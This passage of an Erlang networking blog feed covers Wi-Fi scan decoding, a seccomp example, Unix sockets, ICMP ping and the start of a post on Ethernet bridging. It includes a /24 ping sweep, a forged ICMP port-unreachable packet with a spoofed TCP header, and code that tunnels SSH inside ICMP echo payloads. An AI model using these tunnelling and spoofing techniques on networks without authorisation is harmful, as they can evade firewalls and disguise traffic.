custom:<<23,0,0,0,32,76,97,115,116,32,98,101,97,99,111,110,58,32,53,54,52,109,
115,32,97,103,111>>
genie:<<88,0,0,0,0,19,87,105,114,101,108,101,115,115,77,105,115,115,105,115,
115,97,117,103,97,1,8,130,132,139,12,18,150,24,36,3,1,1,7,6,67,65,32,1,
11,30,42,1,2,50,4,48,72,96,108,150,6,0,64,150,0,20,0,221,6,0,64,150,1,
1,4,221,5,0,64,150,3,5,221,5,0,64,150,11,9,221,5,0,64,150,20,0>>
</code></pre>
<h3>
Decoding the Binaries</h3>
<p>
Decoding the scan results is simple. For example, for those of you stalking me, from the example above:</p>
<ul>
<li>the bssid looks like: <code><<1,0, Bytes:6/bytes, 0,0,0,0,0,0,0,0>></code></li>
</ul>
<p>
Each of the 6 bytes can be printed as hex. In the example:</p>
<pre><code>1> <<1,0, BSSID:6/bytes, 0,0,0,0,0,0,0,0>> = <<1,0,0,30,74,31,75,76,0,0,0,0,0,0,0,0>>.
<<1,0,0,30,74,31,75,76,0,0,0,0,0,0,0,0>>
2> lists:flatten(string:join([ io_lib:format("~.16b", [N]) || <<N:8>> <= BSSID ], ":")).
"0:1e:4a:1f:4b:4c"
</code></pre>
<p>
<strike>What's the preceding <code><<1,0>></code>? No idea as yet :)</strike>
The BSSID is a struct sockaddr:
<pre><code>
struct sockaddr {
sa_family_t family; /* uint16_t */
char sa_data[14];
}
</code></pre>
The family is set to ARPHRD_ETHER or 1 in native endian format (little in the example above). The BSSID, like a MAC address, is 6 bytes. The remaining 8 bytes are zeroes.
</p>
<ul>
<li>the frequency is either a native, unsigned 64-bit integer holding
either the channel (usually a number from 1-11) or the frequency</li>
</ul>
<p>In the example above, a channel is indicated by a number less than 1000:</p>
<pre><code>1> <<Channel:8/native-unsigned-integer-unit:8>> = <<1,0,0,0,0,0,0,0>>.
1.
</code></pre>
<p>And the frequency, if it's available, can be calculated like this:</p>
<pre><code>1> <<Mantissa:4/native-signed-integer-unit:8, Exponent:2/native-signed-integer-unit:8, _I:8, _Flags:8>> = <<108,9,0,0,6,0,0,0>>.
<<108,9,0,0,6,0,0,0>>
2> Mantissa*math:pow(10, Exponent).
2.412e9
</code></pre>
<ul>
<li>the ESSID is prefaced by the length, 2 bytes set to 1 and the ESSID:</li>
</ul>
<p>
From the example:</p>
<pre><code>1> <<Len:2/native-unsigned-integer-unit:8, 1:2/native-unsigned-integer-unit:8, ESSID/binary>> = <<14,0,1,0,116,104,101,101,115,115,105,100,105,115,97,108, 105,101>>.
<<14,0,1,0,116,104,101,101,115,115,105,100,105,115,97,108, 105,101>>
2> Len.
14
16> ESSID.
<<"theessidisalie">>
</code></pre>
<ul>
<li>the quality: each byte represents a statistic</li>
</ul>
<p>
From the example:</p>
<pre><code>17> <<Qual:8, Level:8/signed, Noise:8, Updated:8>> = <<40,186,0,75>>.
<<40,186,0,75>>
18> {Qual, Level, Noise, Updated}.
{40,-70,0,75}
</code></pre>
<p>
So the signal quality of this AP is ok (40/70).</p>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8577871288924093307.post-9074435504296368072011-02-07T17:06:00.003-05:002012-06-29T15:38:06.905-04:00Quick prctl(PR_SET_SECCOMP) ExampleUsing <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/prctl.2.html">prctl(PR_SET_SECCOMP)</a> allows a process -- running without any special permissions -- to restrict itself to only 4 system calls: read(2), write(2), _exit(2), and sigreturn(2). Anything else results in the process getting slapped with a SIGKILL. Useful, maybe, for sandboxing.<br />
<br />
Trying it out by looking at the man page:<br />
<pre>prctl(PR_SET_SECCOMP, 0x1, 0, 0, 0) = 0
+++ killed by SIGKILL +++
Killed
</pre><br />
prctl returns 0 (success) but then is killed when it calls _exit(2).<br />
<br />
Thanks to this <a href="http://lists.debian.org/debian-kernel/2010/10/msg00262.html">ticket</a> for an explanation and working code.<br />
<br />
<pre class="Code"><span class="PreProc">#include </span><span class="Constant"><unistd.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/prctl.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/syscall.h></span>
<span class="PreProc">#include </span><span class="Constant"><asm/unistd.h></span>
<span class="Type">int</span>
main(<span class="Type">int</span> argc, <span class="Type">char</span> *argv[])
{
<span class="Statement">if</span> (prctl(PR_SET_SECCOMP, <span class="Constant">1</span>, <span class="Constant">0</span>, <span class="Constant">0</span>, <span class="Constant">0</span>) != <span class="Constant">0</span>)
(<span class="Type">void</span>)write(STDERR_FILENO, <span class="Constant">"prctl failed</span><span class="Special">\n</span><span class="Constant">"</span>, <span class="Constant">13</span>);
<span class="Statement">else</span>
(<span class="Type">void</span>)write(STDOUT_FILENO, <span class="Constant">"prctl ok</span><span class="Special">\n</span><span class="Constant">"</span>, <span class="Constant">9</span>);
(<span class="Type">void</span>)syscall(__NR_exit);
}
</pre><br />
And here is an example that echoes back any data typed in on standard input with the length prepended:<br />
<br />
<pre class="Code"><span class="PreProc">#include </span><span class="Constant"><unistd.h></span>
<span class="PreProc">#include </span><span class="Constant"><string.h></span>
<span class="PreProc">#include </span><span class="Constant"><stdio.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/prctl.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/syscall.h></span>
<span class="PreProc">#include </span><span class="Constant"><asm/unistd.h></span>
<span class="Type">void</span> length();
<span class="Type">int</span>
main(<span class="Type">int</span> argc, <span class="Type">char</span> *argv[])
{
<span class="Statement">if</span> (prctl(PR_SET_SECCOMP, <span class="Constant">1</span>, <span class="Constant">0</span>, <span class="Constant">0</span>, <span class="Constant">0</span>) != <span class="Constant">0</span>) {
(<span class="Type">void</span>)write(STDERR_FILENO, <span class="Constant">"prctl failed</span><span class="Special">\n</span><span class="Constant">"</span>, <span class="Constant">13</span>);
}
<span class="Statement">else</span> {
(<span class="Type">void</span>)write(STDOUT_FILENO, <span class="Constant">"prctl ok</span><span class="Special">\n</span><span class="Constant">"</span>, <span class="Constant">9</span>);
length();
}
(<span class="Type">void</span>)syscall(__NR_exit);
}
<span class="Type">void</span>
length()
{
<span class="Type">char</span> buf[<span class="Constant">1024</span>];
<span class="Type">char</span> num[<span class="Constant">256</span>];
<span class="Type">size_t</span> n = <span class="Constant">0</span>;
<span class="Statement">for</span> ( ; ; ) {
(<span class="Type">void</span>)memset(buf, <span class="Constant">0</span>, <span class="Statement">sizeof</span>(buf));
(<span class="Type">void</span>)memset(num, <span class="Constant">0</span>, <span class="Statement">sizeof</span>(num));
n = read(STDIN_FILENO, buf, <span class="Statement">sizeof</span>(buf)-<span class="Constant">1</span>);
<span class="Statement">if</span> (n <= <span class="Constant">0</span>)
<span class="Statement">return</span>;
(<span class="Type">void</span>)snprintf(num, <span class="Statement">sizeof</span>(num), <span class="Constant">"</span><span class="Special">%u</span><span class="Constant">:"</span>, n);
(<span class="Type">void</span>)write(STDOUT_FILENO, num, strlen(num));
(<span class="Type">void</span>)write(STDOUT_FILENO, buf, strlen(buf));
}
}
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-90258263458307176752010-12-25T09:57:00.000-05:002010-12-25T09:57:22.442-05:00Unix SocketsThere are various ways to use Unix sockets from within Erlang such as <a href="https://github.com/erlware/gen_socket">gen_socket</a> and <a href="https://github.com/gebi/jungerl/tree/master/lib/unixdom_drv">unixdom_drv</a>. <a href="https://github.com/erlang/otp/tree/dev/lib/kernel/examples/uds_dist">Code examples</a> are even bundled with the Erlang source.<br />
<br />
To work with Unix sockets, I've broken out the socket primitives in the <a href="https://github.com/msantos/procket">procket</a> NIF and made them accessible from Erlang.<br />
<br />
Unix (or local or file) sockets reside as files on the local server filesystem. Like internet sockets, the Unix version can be created as either stream (reliable, connected, no packet boundary) or datagram (unreliable, packet boundaries) sockets.<br />
<br />
<h2>Creating a Datagram Socket</h2><br />
The Erlang procket functions are simple wrappers around the C library. See the C library man pages for more details.<br />
<br />
To register the server, we get a socket file descriptor and bind it to the pathname of the socket on the filesystem. The bind function takes 2 arguments, the file descriptor and a sockaddr_un. On Linux, the sockaddr_un is defined as:<br />
<br />
<pre>typedef unsigned short int sa_family_t;
struct sockaddr_un {
sa_family_t sun_family; /* 2 bytes: AF_UNIX */
char sun_path[UNIX_PATH_MAX]; /* 108 bytes: pathname */
};
</pre><br />
We use a binary to compose the structure, zero'ing out the unused portion:<br />
<br />
<pre>#define UNIX_PATH_MAX 108
#define PATH <<"/tmp/unix.sock">>
<<?PF_LOCAL:16/native, % sun_family
?PATH/binary, % address
0:((?UNIX_PATH_MAX-byte_size(?PATH))*8)
>>
</pre><br />
This binary representation of the socket structure has a portability issue. For BSD systems, the first byte of the structure holds the length of the socket address. The second byte is set to the protocol family. The value for UNIX_PATH_MAX is also smaller:<br />
<pre>typedef __uint8_t __sa_family_t; /* socket address family */
struct sockaddr_un {
unsigned char sun_len; /* 1 byte: sockaddr len including null */
sa_family_t sun_family; /* 1 byte: AF_UNIX */
char sun_path[104]; /* path name (gag) */
};
</pre>The binary can be built like:<br />
<pre>#define UNIX_PATH_MAX 104
#define PATH <<"/tmp/unix.sock">>
<<
(byte_size(?PATH)):8, % socket address length
?PF_LOCAL:8, % sun_family
?PATH/binary, % address
0:((?UNIX_PATH_MAX-byte_size(?PATH))*8)
>>
</pre><br />
The code below might need to be adjusted for BSD. Or it might just work. Some code I tested on Mac OS X just happened to work, presumably because the length field was ignored, the endianness happened to put the protocol family in the second byte and the extra 4 bytes was truncated.<br />
<br />
Here is the code to send data from the client to the server:<br />
<script src="https://gist.github.com/754846.js?file=unix_dgram.erl"></script><br />
<br />
Start up an Erlang VM and run the server (remembering to include the path to the procket library):<br />
<br />
<pre>$ erl -pa /path/to/procket/ebin
Erlang R14B02 (erts-5.8.3) [source] [smp:2:2] [rq:2] [async-threads:0] [hipe] [kernel-poll:false]
Eshell V5.8.3 (abort with ^G)
1> unix_dgram:server().
</pre><br />
And in a second Erlang VM run:<br />
<pre>1> unix_dgram:client(<<104,101,108,108,111,32,119,111,114,108,100>>). % Erlangish for <<"hello world">>, I am being a smartass
</pre><br />
In the first VM, you should see printed out:<br />
<pre><<"hello world">>
ok
</pre><br />
<h2>Creating an Abstract Socket</h2><br />
Linux allows you to bind an arbitrary name (a name that is not a file system path) by using an abstract socket. The abstract socket naming convention uses a NULL prefacing arbitrary bytes in place of the path used by traditional Unix sockets. To define an abstract socket, a binary is passed as the second argument to procket:bind/2, in the format of a struct sockaddr:<br />
<pre><<?PF_LOCAL:16/native, % sun_family
0:8, % abstract address
"1234", % the address
0:((?UNIX_PATH_MAX-(1+4)*8))
>>
</pre><br />
To create a datagram echo server, the source address of the client socket is bound to an address so the server has somewhere to send the response. We modify the datagram server to use recvfrom/4, passing in an additional flag argument (which is set to 0) and a length. recvfrom/4 will return an additional value containing up to <i>length</i> bytes of the socket address.<br />
<br />
We also need to modify the client to bind to an abstract socket. The server will receive this socket address in the return value of recvfrom/4; this value can be passed to sendto/4.<br />
<script src="https://gist.github.com/754848.js?file=unix_dgram1.erl"></script><br />
<br />
<pre>1> unix_dgram1:server().
1> unix_dgram1:client(<<104,101,108,108,111,32,119,111,114,108,100>>).
<<"hello world">>
ok
</pre><br />
<h2>Creating a Stream Socket</h2><br />
To create a stream socket, we use the SOCK_STREAM type (or 1) for the second value passed to socket/3. The socket arguments can be either integers or atoms; for variety, atoms are used here.<br />
<br />
After the socket is bound, we mark the socket as listening and poll it (rather inefficiently) for connections. When a new connection is received, it is accepted, the file descriptor for the new connection is returned and a process is spawned to handle the connection.<br />
<br />
On the client side, after obtaining a stream socket, we do connect the socket and so do not need to explicitly bind it.<br />
<script src="https://gist.github.com/754849.js?file=unix_stream.erl"></script><br />
<br />
Running the same steps for the client and server as above:<br />
<br />
<pre>1> unix_stream:server().
<<"hello world">>
** client disconnected
1> unix_stream:client(<<104,101,108,108,111,32,119,111,114,108,100>>).
<<"hello world">>
ok
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-604467100712976772010-12-03T22:23:00.003-05:002010-12-10T11:42:31.965-05:00ICMP Ping in Erlang, part 2I've covered sending ICMP packets from Erlang using <a href="http://blog.listincomprehension.com/2010/05/icmp-ping-in-erlang.html">BSD raw sockets</a> and Linux's <a href="http://blog.listincomprehension.com/2010/06/fun-with-raw-sockets-in-erlang-sending.html">PF_PACKET socket option</a>.<br />
<br />
<a href="https://github.com/msantos/gen_icmp">gen_icmp</a> tries to be a simple interface for ICMP sockets using the BSD raw socket interface for portability. It should work on both Linux and BSD's (I've tested on Ubuntu and Mac OS X).<br />
<br />
<h2>Sending Ping's</h2>To ping a host:<br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> gen_icmp:ping(<span class="Constant">"erlang.org"</span>).
<span class="Special">[</span><span class="Special">{</span><span class="Constant">ok</span>,<span class="Special">{</span><span class="Constant">193</span>,<span class="Constant">180</span>,<span class="Constant">168</span>,<span class="Constant">20</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">33786</span>,<span class="Constant">0</span>,<span class="Constant">129305</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">" !</span><span class="Special">\"</span><span class="Constant">#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK"</span><span class="Statement">>></span><span class="Special">}}</span><span class="Special">]</span>
</pre>The response is a list of 3-tuples. The third element is a 2-tuple holding the ICMP echo request ID, the sequence number, the elapsed time and the payload.<br />
<br />
A bad response looks like:<br />
<pre class="Code"><span class="Constant">2</span><span class="Statement">></span> gen_icmp:ping(<span class="Constant">"192.168.213.4"</span>).
<span class="Special">[</span><span class="Special">{{</span><span class="Constant">error</span>,host_unreachable<span class="Special">}</span>,
<span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">4</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">34491</span>,<span class="Constant">0</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">69</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">84</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">1</span>,<span class="Constant">14</span>,<span class="Constant">220</span>,<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">119</span>,<span class="Constant">192</span>,
<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">4</span>,<span class="Constant">8</span>,<span class="Constant">0</span>,<span class="Constant">196</span>,...<span class="Statement">>></span><span class="Special">}}</span><span class="Special">]</span>
</pre>The argument to gen_icmp:ping/1 takes either a string or a list of strings. For example, to ping every host on a /24 network:<br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> gen_icmp:ping(<span class="Special">[</span> <span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Identifier">N</span><span class="Special">}</span> <span class="Statement">||</span> <span class="Identifier">N</span> <span class="Statement"><-</span> lists:seq(<span class="Constant">1</span>,<span class="Constant">254</span>) <span class="Special">]</span>).
<span class="Special">[</span><span class="Special">{{</span><span class="Constant">error</span>,host_unreachable<span class="Special">}</span>,
<span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">254</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">54370</span>,<span class="Constant">0</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">69</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">84</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">1</span>,<span class="Constant">13</span>,<span class="Constant">226</span>,<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">119</span>,<span class="Constant">192</span>,
<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">254</span>,<span class="Constant">8</span>,<span class="Constant">0</span>,<span class="Constant">82</span>,...<span class="Statement">>></span><span class="Special">}}</span>,
<span class="Special">{{</span><span class="Constant">error</span>,host_unreachable<span class="Special">}</span>,
<span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">190</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">54370</span>,<span class="Constant">0</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">69</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">84</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">1</span>,<span class="Constant">14</span>,<span class="Constant">34</span>,<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">119</span>,<span class="Constant">192</span>,<span class="Constant">168</span>,
<span class="Constant">213</span>,<span class="Constant">190</span>,<span class="Constant">8</span>,<span class="Constant">0</span>,...<span class="Statement">>></span><span class="Special">}}</span>,
</pre>gen_icmp:ping/1 takes care of opening and closing the raw socket. This operation is somewhat expensive because Erlang is spawning a setuid executable to get the socket. If you'll be doing a lot of ping's, it's better to keep the socket around and use ping/3:<br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> <span class="Special">{</span><span class="Constant">ok</span>,<span class="Identifier">Socket</span><span class="Special">}</span> <span class="Statement">=</span> gen_icmp:open().
<span class="Special">{</span><span class="Constant">ok</span>,<span class="Statement"><</span><span class="Constant">0.308</span>.<span class="Constant">0</span><span class="Statement">></span><span class="Special">}</span>
<span class="Constant">2</span><span class="Statement">></span> gen_icmp:ping(<span class="Identifier">Socket</span>, <span class="Special">[</span><span class="Constant">"www.yahoo.com"</span>, <span class="Constant">"erlang.org"</span>, <span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">1</span><span class="Special">}</span><span class="Special">]</span>,
<span class="Special">[</span><span class="Special">{</span><span class="Constant">id</span>, <span class="Constant">123</span><span class="Special">}</span>, <span class="Special">{</span><span class="Constant">sequence</span>, <span class="Constant">0</span><span class="Special">}</span>, <span class="Special">{</span><span class="Constant">timeout</span>, <span class="Constant">5000</span><span class="Special">}</span><span class="Special">]</span>).
<span class="Special">[</span><span class="Special">{</span><span class="Constant">ok</span>,<span class="Special">{</span><span class="Constant">193</span>,<span class="Constant">180</span>,<span class="Constant">168</span>,<span class="Constant">20</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">123</span>,<span class="Constant">0</span>,<span class="Constant">126270</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">" !</span><span class="Special">\"</span><span class="Constant">#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK"</span><span class="Statement">>></span><span class="Special">}}</span>,
<span class="Special">{</span><span class="Constant">ok</span>,<span class="Special">{</span><span class="Constant">69</span>,<span class="Constant">147</span>,<span class="Constant">125</span>,<span class="Constant">65</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">123</span>,<span class="Constant">0</span>,<span class="Constant">29377</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">" !</span><span class="Special">\"</span><span class="Constant">#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK"</span><span class="Statement">>></span><span class="Special">}}</span>,
<span class="Special">{</span><span class="Constant">ok</span>,<span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">1</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">123</span>,<span class="Constant">0</span>,<span class="Constant">3586</span><span class="Special">}</span>,
<span class="Statement"><<</span><span class="Constant">" !</span><span class="Special">\"</span><span class="Constant">#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK"</span><span class="Statement">>></span><span class="Special">}}</span><span class="Special">]</span>
<span class="Constant">3</span><span class="Statement">></span> gen_icmp:close(<span class="Identifier">Socket</span>).
<span class="Constant">ok</span>
</pre><br />
<h2>Creating Other ICMP Packet Types</h2><br />
ICMP destination unreachable and time exceeded packets return at least the first 64 bits of the header and payload of the original packet. Here is an example of generating an ICMP port unreachable for a fake TCP packet sent to port 80.<br />
<pre class="Code"><span class="Statement">-module</span>(<span class="Constant">icmperr</span>).
<span class="Statement">-export</span>(<span class="Special">[</span><span class="Constant">unreachable</span><span class="Statement">/</span><span class="Constant">3</span><span class="Special">]</span>).
<span class="PreProc">-include</span>(<span class="Constant">"epcap_net.hrl"</span>).
<span class="PreProc">-define</span>(<span class="PreProc">IPV4HDRLEN</span>, <span class="Constant">20</span>).
<span class="PreProc">-define</span>(<span class="PreProc">TCPHDRLEN</span>, <span class="Constant">20</span>).
unreachable(<span class="Identifier">Saddr</span>, <span class="Identifier">Daddr</span>, <span class="Identifier">Data</span>) <span class="Statement">-></span>
<span class="Special">{</span><span class="Constant">ok</span>, <span class="Identifier">Socket</span><span class="Special">}</span> <span class="Statement">=</span> gen_icmp:open(),
<span class="Identifier">IP</span> <span class="Statement">=</span> <span class="Type">#ipv4</span><span class="Special">{</span>
<span class="Constant">p</span> <span class="Statement">=</span> <span class="PreProc">?IPPROTO_TCP</span>,
<span class="Constant">len</span> <span class="Statement">=</span> <span class="PreProc">?IPV4HDRLEN</span> <span class="Statement">+</span> <span class="PreProc">?TCPHDRLEN</span> <span class="Statement">+</span> byte_size(<span class="Identifier">Data</span>),
<span class="Constant">saddr</span> <span class="Statement">=</span> <span class="Identifier">Daddr</span>,
<span class="Constant">daddr</span> <span class="Statement">=</span> <span class="Identifier">Saddr</span>
<span class="Special">}</span>,
<span class="Identifier">TCP</span> <span class="Statement">=</span> <span class="Type">#tcp</span><span class="Special">{</span>
<span class="Constant">dport</span> <span class="Statement">=</span> <span class="Constant">80</span>,
<span class="Constant">sport</span> <span class="Statement">=</span> crypto:rand_uniform(<span class="Constant">0</span>, <span class="Constant">16#FFFF</span>),
<span class="Constant">seqno</span> <span class="Statement">=</span> crypto:rand_uniform(<span class="Constant">0</span>, <span class="Constant">16#FFFF</span>),
<span class="Constant">syn</span> <span class="Statement">=</span> <span class="Constant">1</span>
<span class="Special">}</span>,
<span class="Identifier">IPsum</span> <span class="Statement">=</span> epcap_net:makesum(<span class="Identifier">IP</span>),
<span class="Identifier">TCPsum</span> <span class="Statement">=</span> epcap_net:makesum(<span class="Special">[</span><span class="Identifier">IP</span>, <span class="Identifier">TCP</span>, <span class="Identifier">Data</span><span class="Special">]</span>),
<span class="Identifier">Packet</span> <span class="Statement">=</span> <span class="Statement"><<</span>
(epcap_net:ipv4(<span class="Identifier">IP</span><span class="Type">#ipv4</span><span class="Special">{</span><span class="Constant">sum</span> <span class="Statement">=</span> <span class="Identifier">IPsum</span><span class="Special">}</span>))<span class="Statement">/</span><span class="Type">bits</span>,
(epcap_net:tcp(<span class="Identifier">TCP</span><span class="Type">#tcp</span><span class="Special">{</span><span class="Constant">sum</span> <span class="Statement">=</span> <span class="Identifier">TCPsum</span><span class="Special">}</span>))<span class="Statement">/</span><span class="Type">bits</span>,
<span class="Identifier">Data</span><span class="Statement">/</span><span class="Type">bits</span>
<span class="Statement">>></span>,
<span class="Identifier">ICMP</span> <span class="Statement">=</span> gen_icmp:packet(<span class="Special">[</span>
<span class="Special">{</span><span class="Constant">type</span>, <span class="PreProc">?ICMP_DEST_UNREACH</span><span class="Special">}</span>,
<span class="Special">{</span><span class="Constant">code</span>, <span class="PreProc">?ICMP_UNREACH_PORT</span><span class="Special">}</span>
<span class="Special">]</span>, <span class="Identifier">Packet</span>),
<span class="Constant">ok</span> <span class="Statement">=</span> gen_icmp:send(<span class="Identifier">Socket</span>, <span class="Identifier">Daddr</span>, <span class="Identifier">ICMP</span>),
gen_icmp:close(<span class="Identifier">Socket</span>).
</pre>To create the IPv4 and TCP headers, we make the protocol records and use the epcap_net module functions to encode the headers with the proper checksums. For creating the ICMP packet, we use the gen_icmp:packet/2 function (which again simply calls epcap_net).<br />
<br />
<br />
<h2>ICMP Ping Tunnel</h2><br />
We can tunnel any data we like in the payload of an ICMP packet. In this example, we'll use ICMP echo requests to tunnel an ssh connection between 2 hosts. The ICMP echo replies sent back by the peer OS ensure the data was received, like the ACK in a TCP connection.<br />
<br />
The tunnel exports 2 functions:<br />
<br />
<ul><li>ptun:server(ClientAddress, LocalPort) -> void()<br />
<br />
<pre>Types ClientAddress = tuple()
LocalPort = 0..65534
ClientAddress is the IPv4 address of the peer represented as a tuple.
The server listens on LocalPort for TCP connections and will close
the port after a TCP client connects. Data received on this port
will be sent to the peer as the payload of the ICMP packets.
</pre><br />
<br />
<li>ptun:client(ServerAddress, LocalPort) -> void()<br />
<br />
<pre>Types ServerAddress = tuple()
LocalPort = 0..65534
ServerAddress is the IPv4 address of the peer.
When the client receives an ICMP echo request, the client opens a
TCP connection to the LocalPort on localhost, proxying the data.
</pre></ul><script src="https://gist.github.com/727821.js?file=ptun.erl"></script> To start the tunnel, you'll need 2 hosts. In this example, 192.168.213.7 is the client and 192.168.213.119 is the server. 192.168.213.7 forwards any tunnelled data it receives to a local SSH server. On 192.168.213.7:
<pre>1> ptun:client({192,168,213,119}, 22).
</pre>On 192.168.213.119:
<pre>1> ptun:server({192,168,213,7}, 8787).
</pre>Open another shell and start an SSH connection to port 8787 on localhost:
<pre>ssh -p 8787 127.0.0.1
<...>
$ ifconfig eth0 | awk '/inet addr/{print $2}'
addr:192.168.213.7
</pre>Unknownnoreply@blogger.com20tag:blogger.com,1999:blog-8577871288924093307.post-91382527985941048022010-11-14T11:28:00.003-05:002010-11-14T20:55:40.482-05:00Playing with Diagrams<a href="http://www.websequencediagrams.com/">websequencediagrams</a> is a site that generates diagrams, sort of like <a href="http://www.graphviz.org/">GraphViz</a> or <a href="http://www.diagrammr.com/">Diagrammr</a>.<br />
<br />
The site has some sample code for generating the image files programmatically. Here is an example in Erlang:<br />
<script src="https://gist.github.com/676318.js?file=wsd.erl"></script><br />
To generate an image from a description in a text file such as:<br />
<pre>client->server: POST request containing style and message
note right of server: server generates PNG file
server->client: server returns JSON containing image name
client->server: GET request for image
server->client: server returns PNG file
</pre><br />
Read the file into Erlang and render the description:<br />
<pre>inets:start(),
{ok, Bin} = file:read_file("descr.txt"),
wsd:render([{message, binary_to_list(Bin)}]).
</pre>The output looks like:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn7p-vBKisoNT3KB2SFp2pIPogfaNVc8gEVQd5tRUoljCKN9HQz8x69eUvjSBQvd-qisGngc8pzye-8A1wBtmqimd62puhpzLCVqgmpbH7PfhZb8X0uf0eiZrHHKBFQ_eRpsHPeqY-FLo/s1600/mscnpqHex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn7p-vBKisoNT3KB2SFp2pIPogfaNVc8gEVQd5tRUoljCKN9HQz8x69eUvjSBQvd-qisGngc8pzye-8A1wBtmqimd62puhpzLCVqgmpbH7PfhZb8X0uf0eiZrHHKBFQ_eRpsHPeqY-FLo/s1600/mscnpqHex.png" /></a></div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8577871288924093307.post-69094099331450318992010-10-26T20:56:00.003-04:002010-10-27T08:48:28.905-04:00Fun with Raw Sockets in Erlang: BridgingHosts connecting to another system on the same network map the protocol address (e.g., IPv4 address) of the destination host to a hardware address (e.g., ethernet MAC address) using the ARP protocol. Clients on different networks can communicate by having a device forward the packets between networks. These devices, usually multi-homed and spanning networks, forward packets by re-writing the packet headers: for example, the ethernet header (a bridge), the IP header (a router) or the IP and TCP headers (a NAT).<br />
<p />An ethernet II header:<br />
<ul class="Message"><li class="Message">Preamble:42</li>
<li class="Message">Start of Field Delimeter:8</li>
<li class="Message">Destination Host:48</li>
<li class="Message">Source Host:48</li>
<li class="Message">Type:16</li>
<li class="Message">Protocol Payload:N</li>
<li class="Message">CRC:16</li>
</ul><p/>Not all of these fields will be visible to processes running on the operating system.<br />
<ul><li>The <b>Preamble</b> starts the Ethernet frame (not available to the OS)<br />
<li>The <b>SOF Delimiter</b> marks the start of the destination host address field (not available to the OS)<br />
<li>The <b>Destination Host</b> is the 6 byte MAC address of the target host<br />
<li>The <b>Source Host</b> is the 6 byte MAC address of the sending host<br />
<li>The <b>Type</b> represents the protocol held in the payload. Common types are IPv4 (ETH_P_IP (16#0800)), ARP (ETH_P_ARP (16#0806)) and IPv6 (ETH_P_IPV6 (16#86DD)).<br />
<li>A trailing CRC checksum of the packet (frame check sequence) (usually not available to the OS)<br />
<p/>Ethernet frames can apparently <a href="http://www.faqs.org/rfcs/rfc893.html">include other trailing data</a>, leading to trailing junk when doing packet captures.<br />
<p/>When capturing data off the network, it's important to properly calculate the size of the packet. For example, for an IPv4 TCP packet:<br />
<pre>IP length - (IP header length * 4) - (TCP offset * 4)
</pre></ul><p/>The ethernet header has fixed size fields and so does not explicitly include a field for length. Interestingly, Ethernet 802.3 frames use the <em>Type</em> field for the length (<a href="http://en.wikipedia.org/wiki/Ethernet_frame#Ethernet_II">according to Wikipedia</a> 802.3 packets can be distinguished from Ethernet II packets by: <ol><li>if the value of the Type field is equal to or less than 1500 bytes (maximum frame length), the frame is Ethernet 802.3 and the value represents the length of the frame<br />
<li>if the value of the Type field is equal to or greather than 1536, the frame is Ethernet II and the value represents the protocol type of the encapsulated packet<br />
<p/>The protocol of 802.3 frames is always IPX.<br />
<li>if the value of the Type field is between 1500 and 1536, the behaviour is undefined)<br />
